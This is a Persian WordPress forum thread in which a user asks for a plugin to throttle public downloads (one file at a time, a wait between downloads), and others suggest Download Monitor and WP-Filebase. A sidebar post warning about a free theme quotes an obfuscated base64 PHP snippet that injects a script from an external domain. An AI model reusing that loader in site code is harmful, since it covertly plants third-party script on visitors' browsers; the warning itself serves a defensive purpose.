mmotlagh

افزونه محدود کردن تعداد دانلودها

8 پست در این موضوع قرار دارد

با سلام

می خواستم بپرسم آیا افزونه ای هست که تعداد دانلودهای کاربران رو محدود کنه؟

توضیح:

نمیخوام کاربران رو برای دانلود مجبور به عضویت کنم

از لینک دادن دیگر سایتها با امکانات خود cpanel جلوگیری کردم

چیزی که میخوام اینه که کاربر نتونه مثلا همه لینکهای سایت رو بده به دانلود منیجر و همه رو دانلود کنه و محدودیت به این شکل باشه که امکان دانلود همزمان چند فایل نباشه و از طرفی وقتی طرف دانلود کرد تا مثلا 10 دقیقه نتونه دانلود بعدی رو شروع کنه، این امکان رو من توی سایتهای دیگه دیده بودم و فقط میخواستم ببینم واسه وردپرس هم همچو چیزی هست؟ من نمونه های موجود در مخزن افزونه های وردپرس رو دیدم ولی این چیزی که میگم رو پیدا نکردم...

یه مطلب دیگه اینکه در حال حاضر هاست وردپرس من با هاست دانلودم متفاوته، با این پیشفرض آیا راهی هست؟

0

به اشتراک گذاری این پست

لینک به پست

سلام

این افزونه را امتحان کنید:

http://wordpress.org/extend/plugins/download-monitor/

3

به اشتراک گذاری این پست

لینک به پست

افزونه زیر را امتحان کرده اید؟

http://wordpress.org/extend/plugins/wp-filebase/

4

به اشتراک گذاری این پست

لینک به پست

یک دنیا سپاس از همه دوستان

قبل از هر چیز بگم که متوجه شدم در کنترل پانل سی پانل سایت هم امکان محدود کردن دانلود هست ولی کد نویسی داره (صرفا جهت اطلاع)

افزونه wp-filebase رو دیدم ، به نظر می رسه این افزونه خیلی در زمینه دانلود و کنترل های اون کار کرده و کامله، در اولین فرصت که امتحانش کردم همینجا نتیجه رو اعلام می کنم ولی در توضیحاتش این گزینه خودنمایی می کنه : Traffic limits and bandwidth throttle یعنی محدودیت ترافیک و کنترل پهنای باند ...

افزونه download monitor مثل بسیاری از افزونه های مشابه، دانلودها رو به اعضا یا یک سطح از عضویت محدود میکنه ولی ما این قصد رو نداریم. ما فقط می خوایم افرادی که حرص می زنند برای دانلود رو محدود کنیم تا چند تا چند تا فایل دانلود نکنند و پهنای باند رو بیخودی هدر ندن

و چون لینک های دانلود عمومی هستند و نمیخوایم به اعضا محدود بشه یک کمی کنترل سخت میشه.

من افزونه filebase رو آزمایش می کنم و نتیجه را همینجا اعلام خواهم کرد. با سپاس از شما دوستان.

1

به اشتراک گذاری این پست

لینک به پست

چیزی که میخوام اینه که کاربر نتونه مثلا همه لینکهای سایت رو بده به دانلود منیجر و همه رو دانلود کنه و محدودیت به این شکل باشه که امکان دانلود همزمان چند فایل نباشه و از طرفی وقتی طرف دانلود کرد تا مثلا 10 دقیقه نتونه دانلود بعدی رو شروع کنه، این امکان رو من توی سایتهای دیگه دیده بودم و فقط میخواستم ببینم واسه وردپرس هم همچو چیزی هست؟ من نمونه های موجود در مخزن افزونه های وردپرس رو دیدم ولی این چیزی که میگم رو پیدا نکردم...

یه مطلب دیگه اینکه در حال حاضر هاست وردپرس من با هاست دانلودم متفاوته

دوستان من vps ویندوز دارم آیا کسی راهی داره من بتونم اینو روی VPS ویندوز عملی کرد

شرمنده که اینجا مطرح کردم

0

به اشتراک گذاری این پست

لینک به پست
دوستان من vps ویندوز دارم آیا کسی راهی داره من بتونم اینو روی VPS ویندوز عملی کرد

چه چیزی رو عملی کنید؟

0

به اشتراک گذاری این پست

لینک به پست

آقا مرتضی خب من نقل قول کرده بودم

چیزی که میخوام اینه که کاربر نتونه مثلا همه لینکهای سایت رو بده به دانلود منیجر و همه رو دانلود کنه و محدودیت به این شکل باشه که امکان دانلود همزمان چند فایل نباشه و از طرفی وقتی طرف دانلود کرد تا مثلا 10 دقیقه نتونه دانلود بعدی رو شروع کنه،

آخه فایل های من توی VPS و توی هاست وردپرس نیست که بخوام از افزونه استفاده کنم

کسی راهی داره واسه سرور ویندوز عملیش کرد؟

0

به اشتراک گذاری این پست

لینک به پست

بهتره در یک تاپیک جدا در بخش php مطرح میکردید.

راه های مختلفی داره و البته آسون هم نیست.

باید مثلا شما یک اسکریپت بنویسید و بعد لینک هاتون رو از طریق اون اسکپریت ایجاد و به کاربران بدید. مثلا سایت های آپلودسنتر خارجی.

0

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط Rangarang
      سلام
      با جستجوی این کلید واژه ها خصوصا تو وب فارسی، تقریبا همه راهنمایی ها به نصب همزمان سه افزونه Email Before Download و WordPress Download Monitor و Contact form 7 ختم می شه. من این شیوه رو تا انتها اجرا کردم اما جدا از اینکه نصب سه افزونه برای چنین کاری یه مقدار زیاده کاری به حساب میاد، موضوع اصلی اینه که افزونه Email Before Download  همه ایمیل های وارد شده تو باکس ایمیل رو در بانک اطلاعاتی ثبت می کنه اما برای همه فایل دانلودی رو ارسال نمی کنه، مثلا برای جیمیل می کنه و برای آوتلوک یا ایمیل های شخصی مثل info خیر. از طرف دیگه این افزونه از مخزن وردپرس حذف شده و خیلی وقته برای آپدیتی هم نیومده.
      می خواستم بپرسم آیا شما افزونه یا افزونه های دیگه ای در این زمینه که بتونه نام و ایمیل کاربر رو بگیره و در ازای اون بهش لینک دانلود بده رو می شناسید؟ اگه بله ممنون می شم معرفی کنید.
      با سپاس
    • توسط maryam300
      سلام به دوستان
      چطور می تونم کاری کنم که فقط اعضای خبرنامه پیامکی ام بتونند دانلود کنند و همچنین قسمتی از متن رو مشاهده کنند. و کسانی که عضو نباشند نتونند دانلود کنند یا اون قسمت مشخص براشون مخفی باشه.
      خلاصه دو کار:
      1-دانلود ویژه اعضای خبرنامه پیامکی
      2-مشاهده برخی مطالب ویژه اعضای خبرنامه پیامکی
      مرسی
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط jahan90
      با سلام 
      بنده یک قالب خریدم از شرایطش نصب افزونه cystat است از سایت بیست اسکریپت دانلود کردم ولی نصب نشد مشکل داشت در اینترنت هم وجود نداشت لطف می کنید یه نسخه ساده و تست شده را برای دانلود بگذارید .ممنون
    • توسط m.m.m
      سلام
      افزونه ای وجود داره که بتونم سایتم را مثل این سایت درس کنم ؟؟

http://alghadir.sch.ir/qbank.aspx

یه چیزی مثل این باشه ینی بشه دسته بندیش کرد و اشخاص بتونن دسته را برای دانلود انتخاب کنن